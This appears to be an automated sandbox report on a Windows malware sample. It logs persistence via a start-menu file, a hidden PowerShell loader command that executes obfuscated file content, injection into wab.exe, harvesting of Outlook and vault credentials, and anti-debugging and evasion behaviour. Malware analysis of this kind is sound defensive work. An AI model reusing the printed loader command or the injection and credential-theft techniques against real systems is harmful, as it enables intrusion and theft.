            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\udskaaret.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: 3RBUJ4RX4a.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: CallSite.Targetore.pdb, source: powershell.exe, 00000002.00000002.2402607552.0000000007225000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2405027195.000000000840B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2402607552.0000000007204000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2402607552.0000000007204000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000002.00000002.2406017581.0000000008E9E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fractostratus $Steganography $Plainest54), (copycats @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Overrealism = [AppDomain]::CurrentDomain.GetAssemblies
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Klientfunktionalitet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Diversipedate, $false).DefineType($K
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)"
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)" Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,6_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D7B4BC push esi; ret 5_2_21D7B4BE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D72806 push ecx; ret 5_2_21D72819
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D81219 push esp; iretd 5_2_21D8121A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044693D push ecx; ret 6_2_0044694D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DB84
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DBAC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00451D54 push eax; ret 6_2_00451D61
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00451D34 push eax; ret 7_2_00451D41
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00444E71 push ecx; ret 7_2_00444E81
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00414060 push eax; ret 10_2_00414074
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00414060 push eax; ret 10_2_0041409C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00414039 push ecx; ret 10_2_00414049
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004164EB push 0000006Ah; retf 10_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00416553 push 0000006Ah; retf 10_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00416555 push 0000006Ah; retf 10_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Gloved172\3RBUJ4RX4a.exeJump to dropped file
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\udskaaret.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004047CB
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 44E8564
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5798Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4008Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 9835Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7656Thread sleep count: 151 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7656Thread sleep time: -453000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7656Thread sleep count: 9835 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7656Thread sleep time: -29505000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004065CA FindFirstFileA,FindClose,0_2_004065CA
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004059F9 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F9
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004027AF FindFirstFileA,0_2_004027AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_21D710F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D76580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,LdrInitializeThunk,5_2_21D76580
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00418981 memset,GetSystemInfo,6_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wab.exe, 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.4447585075.00000000062F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeAPI call chain: ExitProcess graph end nodegraph_0-3371
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeAPI call chain: ExitProcess graph end nodegraph_0-3536
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_7-34115
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00CDDAC0 LdrInitializeThunk,LdrInitializeThunk,2_2_00CDDAC0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D760E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_21D760E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,6_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D74AB4 mov eax, dword ptr fs:[00000030h]5_2_21D74AB4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D7724E GetProcessHeap,5_2_21D7724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D760E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_21D760E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_21D72B1C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D72639 LdrInitializeThunk,IsProcessorFeaturePresent,LdrInitializeThunk,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk,5_2_21D72639

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 24FFCB0Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\elanfuaqikmdbmdy"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\goffgnlsvseqesrcrjy"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe"Jump to behavior
            Source: wab.exe, 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerY?
            Source: wab.exe, 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
